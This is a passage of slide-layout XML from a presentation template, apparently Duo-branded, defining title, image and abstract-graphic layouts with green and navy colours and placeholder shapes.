        <p:cNvPr id="1" name="Shape 326"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="327" name="Google Shape;327;p51"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="13517"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="9144000" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="328" name="Google Shape;328;p51"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329" name="Google Shape;329;p5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330" name="Google Shape;330;p51"/>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2 - Image only (Kickoff 2018)">
  <p:cSld name="CUSTOM_5_1_1_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 331"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="332" name="Google Shape;332;p52"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="10820" r="10828"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-28675" y="-14325"/>
            <a:ext cx="9201348" cy="5188299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="333" name="Google Shape;333;p52"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334" name="Google Shape;334;p5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335" name="Google Shape;335;p52"/>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3 - Graphics only (blank paper)">
  <p:cSld name="CUSTOM_5_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </a:blipFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 336"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="337" name="Google Shape;337;p53"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338" name="Google Shape;338;p5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339" name="Google Shape;339;p53"/>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Z2 - DO NOT USE - Blank">
  <p:cSld name="BLANK_6">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 34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4 - White logo (use over background image)">
  <p:cSld name="CUSTOM_12">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 341"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="342" name="Google Shape;342;p5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43" name="Google Shape;343;p5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344" name="Google Shape;344;p55"/>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7 - Subtitle (guest speaker intro)">
  <p:cSld name="CUSTOM_6">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 345"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="346" name="Google Shape;346;p5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347" name="Google Shape;347;p56"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-753144" y="-2335759"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Google Shape;348;p56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3358774" y="5752888"/>
            <a:ext cx="9371125" cy="1938650"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartInputOutpu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6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8018950" y="-419100"/>
            <a:ext cx="1319700" cy="1319700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="152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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450" y="776875"/>
            <a:ext cx="6615600" cy="2701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56"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="296450" y="3478375"/>
            <a:ext cx="76920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6BBF4E"/>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52" name="Google Shape;352;p56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4083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353" name="Google Shape;353;p56"/>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5 - Title (green graphics 1, details)">
  <p:cSld name="CUSTOM_7">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 354"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="Google Shape;355;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670275" y="3177625"/>
            <a:ext cx="2368200" cy="236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57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3821850" y="2028800"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Google Shape;357;p57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5141600" y="-12"/>
            <a:ext cx="9371125" cy="19386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57"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="149150" y="-332675"/>
            <a:ext cx="2884114" cy="567900"/>
            <a:chOff x="-162300" y="-235325"/>
            <a:chExt cx="2884114" cy="567900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="359" name="Google Shape;359;p57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-16230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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60978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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1381859"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7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2153914"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57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242450" y="347875"/>
            <a:ext cx="6615600" cy="2609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4" name="Google Shape;364;p57" descr="Duo Logo White@2x.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="398750" y="4167425"/>
            <a:ext cx="1527349" cy="494875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p57"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="2816825"/>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3F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F4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6" name="Google Shape;366;p57"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="4878650"/>
            <a:ext cx="88500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367" name="Google Shape;367;p57"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2102900" y="4430250"/>
            <a:ext cx="1284725" cy="2320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6 - Title (green graphics 1)">
  <p:cSld name="CUSTOM_7_3">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 368"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="369" name="Google Shape;369;p58"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70" name="Google Shape;370;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6670275" y="3177625"/>
            <a:ext cx="2368200" cy="236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58"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3821850" y="2028800"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="Google Shape;372;p58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5141600" y="-12"/>
            <a:ext cx="9371125" cy="19386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58"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="149150" y="-332675"/>
            <a:ext cx="2884114" cy="567900"/>
            <a:chOff x="-162300" y="-235325"/>
            <a:chExt cx="2884114" cy="567900"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="374" name="Google Shape;374;p58"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-16230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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="60978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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1381859"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8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2153914"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58"/>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58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7481450" y="4878650"/>
            <a:ext cx="16626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380" name="Google Shape;380;p58"/>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A7 - Title (green graphics 2)">
  <p:cSld name="CUSTOM_7_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 381"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="382" name="Google Shape;382;p59"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383" name="Google Shape;383;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="898725" y="-1829275"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="384" name="Google Shape;384;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="769718"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="-396224"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="3097511"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6898391" y="1931569"/>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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7724775" y="288450"/>
            <a:ext cx="1627800" cy="1627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9" name="Google Shape;389;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="-1022" t="-2412" r="63447" b="85969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556250" y="4651325"/>
            <a:ext cx="2587753" cy="532724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="390" name="Google Shape;390;p59"/>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59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855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392" name="Google Shape;392;p59"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">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8 - Title (green graphics 3)">
  <p:cSld name="CUSTOM_7_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 393"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="394" name="Google Shape;394;p6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395" name="Google Shape;395;p60"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4990775" y="-1821175"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="396" name="Google Shape;396;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7298825" y="1116025"/>
            <a:ext cx="2309700" cy="2309700"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000" flipH="1">
            <a:off x="3432313" y="5942038"/>
            <a:ext cx="8600475" cy="17792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0"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6135875" y="-227205"/>
            <a:ext cx="981600" cy="9816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0"/>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60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3855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401" name="Google Shape;401;p60"/>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X3 - Title (Tech Talks)">
  <p:cSld name="CUSTOM_4">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 36"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Google Shape;37;p7" descr="DTT_lockup_gr-02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="984625" y="1832825"/>
            <a:ext cx="5729575" cy="1433150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Google Shape;38;p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9 - Title (green graphics 4)">
  <p:cSld name="CUSTOM_7_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 402"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="403" name="Google Shape;403;p6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404" name="Google Shape;404;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6059475" y="-1023400"/>
            <a:ext cx="3363900" cy="33639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61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1242350" y="-2194400"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="406" name="Google Shape;406;p61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6564375" y="475025"/>
            <a:ext cx="1627800" cy="1627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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6231250" y="4333495"/>
            <a:ext cx="981600" cy="981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8" name="Google Shape;408;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="-1022" t="-2412" r="63447" b="85969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556250" y="4651325"/>
            <a:ext cx="2587753" cy="532724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p61"/>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0" name="Google Shape;410;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1122775" y="4700875"/>
            <a:ext cx="984229" cy="177775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="411" name="Google Shape;411;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4851300"/>
            <a:ext cx="5372100" cy="2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5 - Graphics (navy abstract 1)">
  <p:cSld name="CUSTOM_10">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 412"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="Google Shape;413;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-285900" y="3935250"/>
            <a:ext cx="2894400" cy="28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4" name="Google Shape;414;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="-1754275" y="-1101375"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="Google Shape;415;p62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="3252152" y="1251900"/>
            <a:ext cx="2639700" cy="26397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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="4118024" y="7221036"/>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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="6212462" y="-525152"/>
            <a:ext cx="1240800" cy="12408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8" name="Google Shape;418;p62"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="10800000" flipH="1">
            <a:off x="4686150" y="2580775"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="419" name="Google Shape;419;p62"/>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420" name="Google Shape;420;p62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233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421" name="Google Shape;421;p62"/>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6 - Graphics (Navy abstract 2)">
  <p:cSld name="CUSTOM_10_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
